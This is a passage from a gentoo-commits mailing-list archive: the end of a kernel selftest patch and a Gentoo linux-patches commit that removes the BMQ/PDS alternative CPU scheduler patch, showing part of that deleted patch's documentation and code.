+ 		pm_nl_set_limits $ns2 1 3
+ 		pm_nl_add_endpoint $ns2 10.0.3.2 dev ns2eth3 flags subflow,backup
+-		FAILING_LINKS="1 2"
+-		run_tests $ns1 $ns2 10.0.1.1 2
++		FAILING_LINKS="1 2" \
++			run_tests $ns1 $ns2 10.0.1.1 2
+ 		chk_join_nr 2 2 2
+ 		chk_add_nr 1 1
+ 		chk_stale_nr $ns2 1 -1 2
+@@ -3041,7 +3041,7 @@ fastclose_tests()
+ 
+ 	if reset_check_counter "fastclose server test" "MPTcpExtMPFastcloseRx"; then
+ 		run_tests $ns1 $ns2 10.0.1.1 1024 0 fastclose_server
+-		chk_join_nr 0 0 0
++		chk_join_nr 0 0 0 0 0 0 1
+ 		chk_fclose_nr 1 1 invert
+ 		chk_rst_nr 1 1
+ 	fi
+diff --git a/tools/testing/selftests/vm/memfd_secret.c b/tools/testing/selftests/vm/memfd_secret.c
+index 957b9e18c7295..9b298f6a04b37 100644
+--- a/tools/testing/selftests/vm/memfd_secret.c
++++ b/tools/testing/selftests/vm/memfd_secret.c
+@@ -62,6 +62,9 @@ static void test_mlock_limit(int fd)
+ 	char *mem;
+ 
+ 	len = mlock_limit_cur;
++	if (len % page_size != 0)
++		len = (len/page_size) * page_size;
++
+ 	mem = mmap(NULL, len, prot, mode, fd, 0);
+ 	if (mem == MAP_FAILED) {
+ 		fail("unable to mmap secret memory\n");


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-01-05 14:54 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-01-05 14:54 UTC (permalink / raw
  To: gentoo-commits

commit:     1f7886178ead940a7f6b3d93d4ba917ec0d549d2
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Jan  5 14:54:35 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Jan  5 14:54:35 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=1f788617

BMQ fails dry-run, remove for investigation

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                 |     4 -
 5020_BMQ-and-PDS-io-scheduler-v6.1-r1.patch | 10236 --------------------------
 2 files changed, 10240 deletions(-)

diff --git a/0000_README b/0000_README
index b95d2a2c..248cb097 100644
--- a/0000_README
+++ b/0000_README
@@ -386,7 +386,3 @@ Desc:   Kernel fs for Linux that provides easier uid/gid-shifting for containers
 Patch:  5010_enable-cpu-optimizations-universal.patch
 From:   https://github.com/graysky2/kernel_compiler_patch
 Desc:   Kernel >= 5.15 patch enables gcc = v11.1+ optimizations for additional CPUs.
-
-Patch:  5020_BMQ-and-PDS-io-scheduler-v6.1-r1.patch
-From:   https://gitlab.com/alfredchen/projectc
-Desc:   BMQ(BitMap Queue) Scheduler. A new CPU scheduler developed from PDS(incld). Inspired by the scheduler in zircon.

diff --git a/5020_BMQ-and-PDS-io-scheduler-v6.1-r1.patch b/5020_BMQ-and-PDS-io-scheduler-v6.1-r1.patch
deleted file mode 100644
index 882261ca..00000000
--- a/5020_BMQ-and-PDS-io-scheduler-v6.1-r1.patch
+++ /dev/null
@@ -1,10236 +0,0 @@
-diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
-index 42af9ca0127e..31747ec54f9d 100644
---- a/Documentation/admin-guide/kernel-parameters.txt
-+++ b/Documentation/admin-guide/kernel-parameters.txt
-@@ -5406,6 +5406,12 @@
- 	sa1100ir	[NET]
- 			See drivers/net/irda/sa1100_ir.c.
-
-+	sched_timeslice=
-+			[KNL] Time slice in ms for Project C BMQ/PDS scheduler.
-+			Format: integer 2, 4
-+			Default: 4
-+			See Documentation/scheduler/sched-BMQ.txt
-+
- 	sched_verbose	[KNL] Enables verbose scheduler debug messages.
-
- 	schedstats=	[KNL,X86] Enable or disable scheduled statistics.
-diff --git a/Documentation/admin-guide/sysctl/kernel.rst b/Documentation/admin-guide/sysctl/kernel.rst
-index 98d1b198b2b4..d7c78a107f93 100644
---- a/Documentation/admin-guide/sysctl/kernel.rst
-+++ b/Documentation/admin-guide/sysctl/kernel.rst
-@@ -1552,3 +1552,13 @@ is 10 seconds.
-
- The softlockup threshold is (``2 * watchdog_thresh``). Setting this
- tunable to zero will disable lockup detection altogether.
-+
-+yield_type:
-+===========
-+
-+BMQ/PDS CPU scheduler only. This determines what type of yield calls
-+to sched_yield will perform.
-+
-+  0 - No yield.
-+  1 - Deboost and requeue task. (default)
-+  2 - Set run queue skip task.
-diff --git a/Documentation/scheduler/sched-BMQ.txt b/Documentation/scheduler/sched-BMQ.txt
-new file mode 100644
-index 000000000000..05c84eec0f31
---- /dev/null
-+++ b/Documentation/scheduler/sched-BMQ.txt
-@@ -0,0 +1,110 @@
-+                         BitMap queue CPU Scheduler
-+                         --------------------------
-+
-+CONTENT
-+========
-+
-+ Background
-+ Design
-+   Overview
-+   Task policy
-+   Priority management
-+   BitMap Queue
-+   CPU Assignment and Migration
-+
-+
-+Background
-+==========
-+
-+BitMap Queue CPU scheduler, referred to as BMQ from here on, is an evolution
-+of previous Priority and Deadline based Skiplist multiple queue scheduler(PDS),
-+and inspired by Zircon scheduler. The goal of it is to keep the scheduler code
-+simple, while efficiency and scalable for interactive tasks, such as desktop,
-+movie playback and gaming etc.
-+
-+Design
-+======
-+
-+Overview
-+--------
-+
-+BMQ use per CPU run queue design, each CPU(logical) has it's own run queue,
-+each CPU is responsible for scheduling the tasks that are putting into it's
-+run queue.
-+
-+The run queue is a set of priority queues. Note that these queues are fifo
-+queue for non-rt tasks or priority queue for rt tasks in data structure. See
-+BitMap Queue below for details. BMQ is optimized for non-rt tasks in the fact
-+that most applications are non-rt tasks. No matter the queue is fifo or
-+priority, In each queue is an ordered list of runnable tasks awaiting execution
-+and the data structures are the same. When it is time for a new task to run,
-+the scheduler simply looks the lowest numbered queueue that contains a task,
-+and runs the first task from the head of that queue. And per CPU idle task is
-+also in the run queue, so the scheduler can always find a task to run on from
-+its run queue.
-+
-+Each task will assigned the same timeslice(default 4ms) when it is picked to
-+start running. Task will be reinserted at the end of the appropriate priority
-+queue when it uses its whole timeslice. When the scheduler selects a new task
-+from the priority queue it sets the CPU's preemption timer for the remainder of
-+the previous timeslice. When that timer fires the scheduler will stop execution
-+on that task, select another task and start over again.
-+
-+If a task blocks waiting for a shared resource then it's taken out of its
-+priority queue and is placed in a wait queue for the shared resource. When it
-+is unblocked it will be reinserted in the appropriate priority queue of an
-+eligible CPU.
-+
-+Task policy
-+-----------
-+
-+BMQ supports DEADLINE, FIFO, RR, NORMAL, BATCH and IDLE task policy like the
-+mainline CFS scheduler. But BMQ is heavy optimized for non-rt task, that's
-+NORMAL/BATCH/IDLE policy tasks. Below is the implementation detail of each
-+policy.
-+
-+DEADLINE
-+	It is squashed as priority 0 FIFO task.
-+
-+FIFO/RR
-+	All RT tasks share one single priority queue in BMQ run queue designed. The
-+complexity of insert operation is O(n). BMQ is not designed for system runs
-+with major rt policy tasks.
-+
-+NORMAL/BATCH/IDLE
-+	BATCH and IDLE tasks are treated as the same policy. They compete CPU with
-+NORMAL policy tasks, but they just don't boost. To control the priority of
-+NORMAL/BATCH/IDLE tasks, simply use nice level.
-+
-+ISO
-+	ISO policy is not supported in BMQ. Please use nice level -20 NORMAL policy
-+task instead.
-+
-+Priority management
-+-------------------
-+
-+RT tasks have priority from 0-99. For non-rt tasks, there are three different
-+factors used to determine the effective priority of a task. The effective
-+priority being what is used to determine which queue it will be in.
-+
-+The first factor is simply the task’s static priority. Which is assigned from
-+task's nice level, within [-20, 19] in userland's point of view and [0, 39]
-+internally.
-+
-+The second factor is the priority boost. This is a value bounded between
-+[-MAX_PRIORITY_ADJ, MAX_PRIORITY_ADJ] used to offset the base priority, it is
-+modified by the following cases:
-+
-+*When a thread has used up its entire timeslice, always deboost its boost by
-+increasing by one.
-+*When a thread gives up cpu control(voluntary or non-voluntary) to reschedule,
-+and its switch-in time(time after last switch and run) below the thredhold
-+based on its priority boost, will boost its boost by decreasing by one buti is
-+capped at 0 (won’t go negative).
-+
-+The intent in this system is to ensure that interactive threads are serviced
-+quickly. These are usually the threads that interact directly with the user
-+and cause user-perceivable latency. These threads usually do little work and
-+spend most of their time blocked awaiting another user event. So they get the
-+priority boost from unblocking while background threads that do most of the
-+processing receive the priority penalty for using their entire timeslice.
-diff --git a/fs/proc/base.c b/fs/proc/base.c
-index 9e479d7d202b..2a8530021b23 100644
---- a/fs/proc/base.c
-+++ b/fs/proc/base.c
-@@ -479,7 +479,7 @@ static int proc_pid_schedstat(struct seq_file *m, struct pid_namespace *ns,
- 		seq_puts(m, "0 0 0\n");
- 	else
- 		seq_printf(m, "%llu %llu %lu\n",
--		   (unsigned long long)task->se.sum_exec_runtime,
-+		   (unsigned long long)tsk_seruntime(task),
- 		   (unsigned long long)task->sched_info.run_delay,
- 		   task->sched_info.pcount);
-
-diff --git a/include/asm-generic/resource.h b/include/asm-generic/resource.h
-index 8874f681b056..59eb72bf7d5f 100644
---- a/include/asm-generic/resource.h
-+++ b/include/asm-generic/resource.h
-@@ -23,7 +23,7 @@
- 	[RLIMIT_LOCKS]		= {  RLIM_INFINITY,  RLIM_INFINITY },	\
- 	[RLIMIT_SIGPENDING]	= { 		0,	       0 },	\
- 	[RLIMIT_MSGQUEUE]	= {   MQ_BYTES_MAX,   MQ_BYTES_MAX },	\
--	[RLIMIT_NICE]		= { 0, 0 },				\
-+	[RLIMIT_NICE]		= { 30, 30 },				\
- 	[RLIMIT_RTPRIO]		= { 0, 0 },				\
- 	[RLIMIT_RTTIME]		= {  RLIM_INFINITY,  RLIM_INFINITY },	\
- }
-diff --git a/include/linux/sched.h b/include/linux/sched.h
-index ffb6eb55cd13..2e730a59caa2 100644
---- a/include/linux/sched.h
-+++ b/include/linux/sched.h
-@@ -762,8 +762,14 @@ struct task_struct {
- 	unsigned int			ptrace;
-
- #ifdef CONFIG_SMP
--	int				on_cpu;
- 	struct __call_single_node	wake_entry;
-+#endif
-+#if defined(CONFIG_SMP) || defined(CONFIG_SCHED_ALT)
-+	int				on_cpu;
-+#endif
-+
-+#ifdef CONFIG_SMP
-+#ifndef CONFIG_SCHED_ALT
- 	unsigned int			wakee_flips;
- 	unsigned long			wakee_flip_decay_ts;
- 	struct task_struct		*last_wakee;
-@@ -777,6 +783,7 @@ struct task_struct {
- 	 */
- 	int				recent_used_cpu;
- 	int				wake_cpu;
-+#endif /* !CONFIG_SCHED_ALT */
- #endif
- 	int				on_rq;
-
-@@ -785,6 +792,20 @@ struct task_struct {
- 	int				normal_prio;
- 	unsigned int			rt_priority;
-
-+#ifdef CONFIG_SCHED_ALT
-+	u64				last_ran;
-+	s64				time_slice;
-+	int				sq_idx;
-+	struct list_head		sq_node;
-+#ifdef CONFIG_SCHED_BMQ
-+	int				boost_prio;
-+#endif /* CONFIG_SCHED_BMQ */
-+#ifdef CONFIG_SCHED_PDS
-+	u64				deadline;
-+#endif /* CONFIG_SCHED_PDS */
-+	/* sched_clock time spent running */
-+	u64				sched_time;
-+#else /* !CONFIG_SCHED_ALT */
- 	struct sched_entity		se;
- 	struct sched_rt_entity		rt;
- 	struct sched_dl_entity		dl;
-@@ -795,6 +816,7 @@ struct task_struct {
- 	unsigned long			core_cookie;
- 	unsigned int			core_occupation;
- #endif
-+#endif /* !CONFIG_SCHED_ALT */
-
- #ifdef CONFIG_CGROUP_SCHED
- 	struct task_group		*sched_task_group;
-@@ -1545,6 +1567,15 @@ struct task_struct {
- 	 */
- };
-
-+#ifdef CONFIG_SCHED_ALT
-+#define tsk_seruntime(t)		((t)->sched_time)
-+/* replace the uncertian rt_timeout with 0UL */
-+#define tsk_rttimeout(t)		(0UL)
-+#else /* CFS */
-+#define tsk_seruntime(t)	((t)->se.sum_exec_runtime)
-+#define tsk_rttimeout(t)	((t)->rt.timeout)
-+#endif /* !CONFIG_SCHED_ALT */
-+
- static inline struct pid *task_pid(struct task_struct *task)
- {
- 	return task->thread_pid;
-diff --git a/include/linux/sched/deadline.h b/include/linux/sched/deadline.h
-index 7c83d4d5a971..fa30f98cb2be 100644
---- a/include/linux/sched/deadline.h
-+++ b/include/linux/sched/deadline.h
-@@ -1,5 +1,24 @@
- /* SPDX-License-Identifier: GPL-2.0 */
-
-+#ifdef CONFIG_SCHED_ALT
-+
-+static inline int dl_task(struct task_struct *p)
-+{
-+	return 0;
-+}
-+
-+#ifdef CONFIG_SCHED_BMQ
-+#define __tsk_deadline(p)	(0UL)
-+#endif
-+
-+#ifdef CONFIG_SCHED_PDS
-+#define __tsk_deadline(p)	((((u64) ((p)->prio))<<56) | (p)->deadline)
-+#endif
-+
-+#else
-+
-+#define __tsk_deadline(p)	((p)->dl.deadline)
-+
- /*
-  * SCHED_DEADLINE tasks has negative priorities, reflecting
-  * the fact that any of them has higher prio than RT and
-@@ -21,6 +40,7 @@ static inline int dl_task(struct task_struct *p)
- {
- 	return dl_prio(p->prio);
- }
-+#endif /* CONFIG_SCHED_ALT */
-
- static inline bool dl_time_before(u64 a, u64 b)
- {
-diff --git a/include/linux/sched/prio.h b/include/linux/sched/prio.h
-index ab83d85e1183..6af9ae681116 100644
---- a/include/linux/sched/prio.h
-+++ b/include/linux/sched/prio.h
-@@ -18,6 +18,32 @@
- #define MAX_PRIO		(MAX_RT_PRIO + NICE_WIDTH)
- #define DEFAULT_PRIO		(MAX_RT_PRIO + NICE_WIDTH / 2)
-
-+#ifdef CONFIG_SCHED_ALT
-+
-+/* Undefine MAX_PRIO and DEFAULT_PRIO */
-+#undef MAX_PRIO
-+#undef DEFAULT_PRIO
-+
-+/* +/- priority levels from the base priority */
-+#ifdef CONFIG_SCHED_BMQ
-+#define MAX_PRIORITY_ADJ	(7)
-+
-+#define MIN_NORMAL_PRIO		(MAX_RT_PRIO)
-+#define MAX_PRIO		(MIN_NORMAL_PRIO + NICE_WIDTH)
-+#define DEFAULT_PRIO		(MIN_NORMAL_PRIO + NICE_WIDTH / 2)
-+#endif
-+
-+#ifdef CONFIG_SCHED_PDS
-+#define MAX_PRIORITY_ADJ	(0)
-+
-+#define MIN_NORMAL_PRIO		(128)
-+#define NORMAL_PRIO_NUM		(64)
-+#define MAX_PRIO		(MIN_NORMAL_PRIO + NORMAL_PRIO_NUM)
-+#define DEFAULT_PRIO		(MAX_PRIO - NICE_WIDTH / 2)
-+#endif
-+
-+#endif /* CONFIG_SCHED_ALT */
-+
- /*
-  * Convert user-nice values [ -20 ... 0 ... 19 ]
-  * to static priority [ MAX_RT_PRIO..MAX_PRIO-1 ],
-diff --git a/include/linux/sched/rt.h b/include/linux/sched/rt.h
-index 994c25640e15..8c050a59ece1 100644
---- a/include/linux/sched/rt.h
-+++ b/include/linux/sched/rt.h
-@@ -24,8 +24,10 @@ static inline bool task_is_realtime(struct task_struct *tsk)
-
- 	if (policy == SCHED_FIFO || policy == SCHED_RR)
- 		return true;
-+#ifndef CONFIG_SCHED_ALT
- 	if (policy == SCHED_DEADLINE)
- 		return true;
-+#endif
- 	return false;
- }
-
-diff --git a/include/linux/sched/topology.h b/include/linux/sched/topology.h
-index 816df6cc444e..c8da08e18c91 100644
---- a/include/linux/sched/topology.h
-+++ b/include/linux/sched/topology.h
-@@ -234,7 +234,8 @@ static inline bool cpus_share_cache(int this_cpu, int that_cpu)
-
- #endif	/* !CONFIG_SMP */
-
--#if defined(CONFIG_ENERGY_MODEL) && defined(CONFIG_CPU_FREQ_GOV_SCHEDUTIL)
-+#if defined(CONFIG_ENERGY_MODEL) && defined(CONFIG_CPU_FREQ_GOV_SCHEDUTIL) && \
-+	!defined(CONFIG_SCHED_ALT)
- extern void rebuild_sched_domains_energy(void);
- #else
- static inline void rebuild_sched_domains_energy(void)
-diff --git a/init/Kconfig b/init/Kconfig
-index 94125d3b6893..c87ba766d354 100644
---- a/init/Kconfig
-+++ b/init/Kconfig
-@@ -819,6 +819,7 @@ menu "Scheduler features"
- config UCLAMP_TASK
- 	bool "Enable utilization clamping for RT/FAIR tasks"
- 	depends on CPU_FREQ_GOV_SCHEDUTIL
-+	depends on !SCHED_ALT
- 	help
- 	  This feature enables the scheduler to track the clamped utilization
- 	  of each CPU based on RUNNABLE tasks scheduled on that CPU.
-@@ -865,6 +866,35 @@ config UCLAMP_BUCKETS_COUNT
-
- 	  If in doubt, use the default value.
-
-+menuconfig SCHED_ALT
-+	bool "Alternative CPU Schedulers"
-+	default y
-+	help
-+	  This feature enable alternative CPU scheduler"
-+
-+if SCHED_ALT
-+
-+choice
-+	prompt "Alternative CPU Scheduler"
-+	default SCHED_BMQ
-+
-+config SCHED_BMQ
-+	bool "BMQ CPU scheduler"
-+	help
-+	  The BitMap Queue CPU scheduler for excellent interactivity and
-+	  responsiveness on the desktop and solid scalability on normal
-+	  hardware and commodity servers.
-+
-+config SCHED_PDS
-+	bool "PDS CPU scheduler"
-+	help
-+	  The Priority and Deadline based Skip list multiple queue CPU
-+	  Scheduler.
-+
-+endchoice
-+
-+endif
-+
- endmenu
-
- #
-@@ -918,6 +948,7 @@ config NUMA_BALANCING
- 	depends on ARCH_SUPPORTS_NUMA_BALANCING
- 	depends on !ARCH_WANT_NUMA_VARIABLE_LOCALITY
- 	depends on SMP && NUMA && MIGRATION && !PREEMPT_RT
-+	depends on !SCHED_ALT
- 	help
- 	  This option adds support for automatic NUMA aware memory/task placement.
- 	  The mechanism is quite primitive and is based on migrating memory when
-@@ -1015,6 +1046,7 @@ config FAIR_GROUP_SCHED
- 	depends on CGROUP_SCHED
- 	default CGROUP_SCHED
-
-+if !SCHED_ALT
- config CFS_BANDWIDTH
- 	bool "CPU bandwidth provisioning for FAIR_GROUP_SCHED"
- 	depends on FAIR_GROUP_SCHED
-@@ -1037,6 +1069,7 @@ config RT_GROUP_SCHED
- 	  realtime bandwidth for them.
- 	  See Documentation/scheduler/sched-rt-group.rst for more information.
-
-+endif #!SCHED_ALT
- endif #CGROUP_SCHED
-
- config UCLAMP_TASK_GROUP
-@@ -1281,6 +1314,7 @@ config CHECKPOINT_RESTORE
-
- config SCHED_AUTOGROUP
- 	bool "Automatic process group scheduling"
-+	depends on !SCHED_ALT
- 	select CGROUPS
- 	select CGROUP_SCHED
- 	select FAIR_GROUP_SCHED
-diff --git a/init/init_task.c b/init/init_task.c
-index ff6c4b9bfe6b..19e9c662d1a1 100644
---- a/init/init_task.c
-+++ b/init/init_task.c
-@@ -75,9 +75,15 @@ struct task_struct init_task
- 	.stack		= init_stack,
- 	.usage		= REFCOUNT_INIT(2),
- 	.flags		= PF_KTHREAD,
-+#ifdef CONFIG_SCHED_ALT
-+	.prio		= DEFAULT_PRIO + MAX_PRIORITY_ADJ,
-+	.static_prio	= DEFAULT_PRIO,
-+	.normal_prio	= DEFAULT_PRIO + MAX_PRIORITY_ADJ,
-+#else
- 	.prio		= MAX_PRIO - 20,
- 	.static_prio	= MAX_PRIO - 20,
- 	.normal_prio	= MAX_PRIO - 20,
-+#endif
- 	.policy		= SCHED_NORMAL,
- 	.cpus_ptr	= &init_task.cpus_mask,
- 	.user_cpus_ptr	= NULL,
-@@ -88,6 +94,17 @@ struct task_struct init_task
- 	.restart_block	= {
- 		.fn = do_no_restart_syscall,
- 	},
-+#ifdef CONFIG_SCHED_ALT
-+	.sq_node	= LIST_HEAD_INIT(init_task.sq_node),
-+#ifdef CONFIG_SCHED_BMQ
-+	.boost_prio	= 0,
-+	.sq_idx		= 15,
-+#endif
-+#ifdef CONFIG_SCHED_PDS
-+	.deadline	= 0,
-+#endif
-+	.time_slice	= HZ,
-+#else
- 	.se		= {
- 		.group_node 	= LIST_HEAD_INIT(init_task.se.group_node),
- 	},
-@@ -95,6 +112,7 @@ struct task_struct init_task
- 		.run_list	= LIST_HEAD_INIT(init_task.rt.run_list),
- 		.time_slice	= RR_TIMESLICE,
- 	},
-+#endif
- 	.tasks		= LIST_HEAD_INIT(init_task.tasks),
- #ifdef CONFIG_SMP
- 	.pushable_tasks	= PLIST_NODE_INIT(init_task.pushable_tasks, MAX_PRIO),
-diff --git a/kernel/Kconfig.preempt b/kernel/Kconfig.preempt
-index c2f1fd95a821..41654679b1b2 100644
---- a/kernel/Kconfig.preempt
-+++ b/kernel/Kconfig.preempt
-@@ -117,7 +117,7 @@ config PREEMPT_DYNAMIC
-
- config SCHED_CORE
- 	bool "Core Scheduling for SMT"
--	depends on SCHED_SMT
-+	depends on SCHED_SMT && !SCHED_ALT
- 	help
- 	  This option permits Core Scheduling, a means of coordinated task
- 	  selection across SMT siblings. When enabled -- see
-diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
-index b474289c15b8..a23224b45b03 100644
---- a/kernel/cgroup/cpuset.c
-+++ b/kernel/cgroup/cpuset.c
-@@ -787,7 +787,7 @@ static int validate_change(struct cpuset *cur, struct cpuset *trial)
- 	return ret;
- }
-
--#ifdef CONFIG_SMP
-+#if defined(CONFIG_SMP) && !defined(CONFIG_SCHED_ALT)
- /*
-  * Helper routine for generate_sched_domains().
-  * Do cpusets a, b have overlapping effective cpus_allowed masks?
-@@ -1183,7 +1183,7 @@ static void rebuild_sched_domains_locked(void)
- 	/* Have scheduler rebuild the domains */
- 	partition_and_rebuild_sched_domains(ndoms, doms, attr);
- }
--#else /* !CONFIG_SMP */
-+#else /* !CONFIG_SMP || CONFIG_SCHED_ALT */
- static void rebuild_sched_domains_locked(void)
- {
- }
-diff --git a/kernel/delayacct.c b/kernel/delayacct.c
-index e39cb696cfbd..463423572e09 100644
---- a/kernel/delayacct.c
-+++ b/kernel/delayacct.c
-@@ -150,7 +150,7 @@ int delayacct_add_tsk(struct taskstats *d, struct task_struct *tsk)
- 	 */
- 	t1 = tsk->sched_info.pcount;
- 	t2 = tsk->sched_info.run_delay;
--	t3 = tsk->se.sum_exec_runtime;
-+	t3 = tsk_seruntime(tsk);
-
- 	d->cpu_count += t1;
-
-diff --git a/kernel/exit.c b/kernel/exit.c
-index 35e0a31a0315..64e368441cf4 100644
---- a/kernel/exit.c
-+++ b/kernel/exit.c
-@@ -125,7 +125,7 @@ static void __exit_signal(struct task_struct *tsk)
- 			sig->curr_target = next_thread(tsk);
- 	}
-
--	add_device_randomness((const void*) &tsk->se.sum_exec_runtime,
-+	add_device_randomness((const void*) &tsk_seruntime(tsk),
- 			      sizeof(unsigned long long));
-
- 	/*
-@@ -146,7 +146,7 @@ static void __exit_signal(struct task_struct *tsk)
- 	sig->inblock += task_io_get_inblock(tsk);
- 	sig->oublock += task_io_get_oublock(tsk);
- 	task_io_accounting_add(&sig->ioac, &tsk->ioac);
--	sig->sum_sched_runtime += tsk->se.sum_exec_runtime;
-+	sig->sum_sched_runtime += tsk_seruntime(tsk);
- 	sig->nr_threads--;
- 	__unhash_process(tsk, group_dead);
- 	write_sequnlock(&sig->stats_lock);
-diff --git a/kernel/locking/rtmutex.c b/kernel/locking/rtmutex.c
-index 7779ee8abc2a..5b9893cdfb1b 100644
---- a/kernel/locking/rtmutex.c
-+++ b/kernel/locking/rtmutex.c
-@@ -343,7 +343,7 @@ waiter_update_prio(struct rt_mutex_waite
- 	lockdep_assert(RB_EMPTY_NODE(&waiter->tree.entry));
- 
- 	waiter->tree.prio = __waiter_prio(task);
--	waiter->tree.deadline = task->dl.deadline;
-+	waiter->tree.deadline = __tsk_deadline(task);
- }
- 
- /*
-@@ -364,16 +364,20 @@ waiter_clone_prio(struct rt_mutex_waiter
-  * Only use with rt_waiter_node_{less,equal}()
-  */
- #define task_to_waiter_node(p)	\
--	&(struct rt_waiter_node){ .prio = __waiter_prio(p), .deadline = (p)->dl.deadline }
-+	&(struct rt_waiter_node){ .prio = __waiter_prio(p), .deadline = __tsk_deadline(p) }
- #define task_to_waiter(p)	\
- 	&(struct rt_mutex_waiter){ .tree = *task_to_waiter_node(p) }
- 
- static __always_inline int rt_waiter_node_less(struct rt_waiter_node *left,
- 					       struct rt_waiter_node *right)
- {
-+#ifdef CONFIG_SCHED_PDS
-+	return (left->deadline < right->deadline);
-+#else
- 	if (left->prio < right->prio)
- 		return 1;
- 
-+#ifndef CONFIG_SCHED_BMQ
- 	/*
- 	 * If both waiters have dl_prio(), we check the deadlines of the
- 	 * associated tasks.
-@@ -382,16 +386,22 @@ static __always_inline int rt_waiter_nod
- 	 */
- 	if (dl_prio(left->prio))
- 		return dl_time_before(left->deadline, right->deadline);
-+#endif
- 
- 	return 0;
-+#endif
- }
- 
- static __always_inline int rt_waiter_node_equal(struct rt_waiter_node *left,
- 						 struct rt_waiter_node *right)
- {
-+#ifdef CONFIG_SCHED_PDS
-+	return (left->deadline == right->deadline);
-+#else
- 	if (left->prio != right->prio)
- 		return 0;
- 
-+#ifndef CONFIG_SCHED_BMQ
- 	/*
- 	 * If both waiters have dl_prio(), we check the deadlines of the
- 	 * associated tasks.
-@@ -400,8 +410,10 @@ static __always_inline int rt_waiter_nod
- 	 */
- 	if (dl_prio(left->prio))
- 		return left->deadline == right->deadline;
-+#endif
- 
- 	return 1;
-+#endif
- }
- 
- static inline bool rt_mutex_steal(struct rt_mutex_waiter *waiter,
-diff --git a/kernel/sched/Makefile b/kernel/sched/Makefile
-index 976092b7bd45..31d587c16ec1 100644
---- a/kernel/sched/Makefile
-+++ b/kernel/sched/Makefile
-@@ -28,7 +28,12 @@ endif
- # These compilation units have roughly the same size and complexity - so their
- # build parallelizes well and finishes roughly at once:
- #
-+ifdef CONFIG_SCHED_ALT
-+obj-y += alt_core.o
-+obj-$(CONFIG_SCHED_DEBUG) += alt_debug.o
-+else
- obj-y += core.o
- obj-y += fair.o
-+endif
- obj-y += build_policy.o
- obj-y += build_utility.o
-diff --git a/kernel/sched/alt_core.c b/kernel/sched/alt_core.c
-new file mode 100644
-index 000000000000..572eab74418f
---- /dev/null
-+++ b/kernel/sched/alt_core.c
-@@ -0,0 +1,7961 @@
-+/*
-+ *  kernel/sched/alt_core.c
-+ *
-+ *  Core alternative kernel scheduler code and related syscalls
-+ *
-+ *  Copyright (C) 1991-2002  Linus Torvalds
-+ *
-+ *  2009-08-13	Brainfuck deadline scheduling policy by Con Kolivas deletes
-+ *		a whole lot of those previous things.
-+ *  2017-09-06	Priority and Deadline based Skip list multiple queue kernel
-+ *		scheduler by Alfred Chen.
-+ *  2019-02-20	BMQ(BitMap Queue) kernel scheduler by Alfred Chen.
-+ */
-+#include <linux/sched/cputime.h>
-+#include <linux/sched/debug.h>
-+#include <linux/sched/isolation.h>
-+#include <linux/sched/loadavg.h>
-+#include <linux/sched/mm.h>
-+#include <linux/sched/nohz.h>
-+#include <linux/sched/stat.h>
-+#include <linux/sched/wake_q.h>
-+
-+#include <linux/blkdev.h>
-+#include <linux/context_tracking.h>
-+#include <linux/cpuset.h>
-+#include <linux/delayacct.h>
-+#include <linux/init_task.h>
-+#include <linux/kcov.h>
-+#include <linux/kprobes.h>
-+#include <linux/profile.h>
-+#include <linux/nmi.h>
-+#include <linux/scs.h>
-+
-+#include <uapi/linux/sched/types.h>
-+
-+#include <asm/irq_regs.h>
-+#include <asm/switch_to.h>
-+
-+#define CREATE_TRACE_POINTS
-+#include <trace/events/sched.h>
-+#undef CREATE_TRACE_POINTS
-+
-+#include "sched.h"
-+
-+#include "pelt.h"
-+
-+#include "../../io_uring/io-wq.h"
-+#include "../smpboot.h"
-+
-+/*
-+ * Export tracepoints that act as a bare tracehook (ie: have no trace event
-+ * associated with them) to allow external modules to probe them.
-+ */
-+EXPORT_TRACEPOINT_SYMBOL_GPL(pelt_irq_tp);
-+
-+#ifdef CONFIG_SCHED_DEBUG
-+#define sched_feat(x)	(1)
-+/*
-+ * Print a warning if need_resched is set for the given duration (if
-+ * LATENCY_WARN is enabled).
-+ *
-+ * If sysctl_resched_latency_warn_once is set, only one warning will be shown
-+ * per boot.
-+ */
-+__read_mostly int sysctl_resched_latency_warn_ms = 100;
-+__read_mostly int sysctl_resched_latency_warn_once = 1;
-+#else
-+#define sched_feat(x)	(0)
-+#endif /* CONFIG_SCHED_DEBUG */
-+
-+#define ALT_SCHED_VERSION "v6.1-r1"
-+
-+/* rt_prio(prio) defined in include/linux/sched/rt.h */
-+#define rt_task(p)		rt_prio((p)->prio)
-+#define rt_policy(policy)	((policy) == SCHED_FIFO || (policy) == SCHED_RR)
-+#define task_has_rt_policy(p)	(rt_policy((p)->policy))
-+
-+#define STOP_PRIO		(MAX_RT_PRIO - 1)
-+
-+/* Default time slice is 4 in ms, can be set via kernel parameter "sched_timeslice" */
-+u64 sched_timeslice_ns __read_mostly = (4 << 20);
-+
-+static inline void requeue_task(struct task_struct *p, struct rq *rq, int idx);
-+
-+#ifdef CONFIG_SCHED_BMQ
-+#include "bmq.h"
-+#endif
-+#ifdef CONFIG_SCHED_PDS
-+#include "pds.h"
-+#endif
-+
-+static int __init sched_timeslice(char *str)
-+{
-+	int timeslice_ms;
-+
-+	get_option(&str, &timeslice_ms);
-+	if (2 != timeslice_ms)
-+		timeslice_ms = 4;
-+	sched_timeslice_ns = timeslice_ms << 20;
-+	sched_timeslice_imp(timeslice_ms);
-+
-+	return 0;
-+}
-+early_param("sched_timeslice", sched_timeslice);
-+
-+/* Reschedule if less than this many μs left */
-+#define RESCHED_NS		(100 << 10)
-+
-+/**
-+ * sched_yield_type - Choose what sort of yield sched_yield will perform.
-+ * 0: No yield.
-+ * 1: Deboost and requeue task. (default)
-+ * 2: Set rq skip task.
-+ */
-+int sched_yield_type __read_mostly = 1;
-+
-+#ifdef CONFIG_SMP
-+static cpumask_t sched_rq_pending_mask ____cacheline_aligned_in_smp;
-+
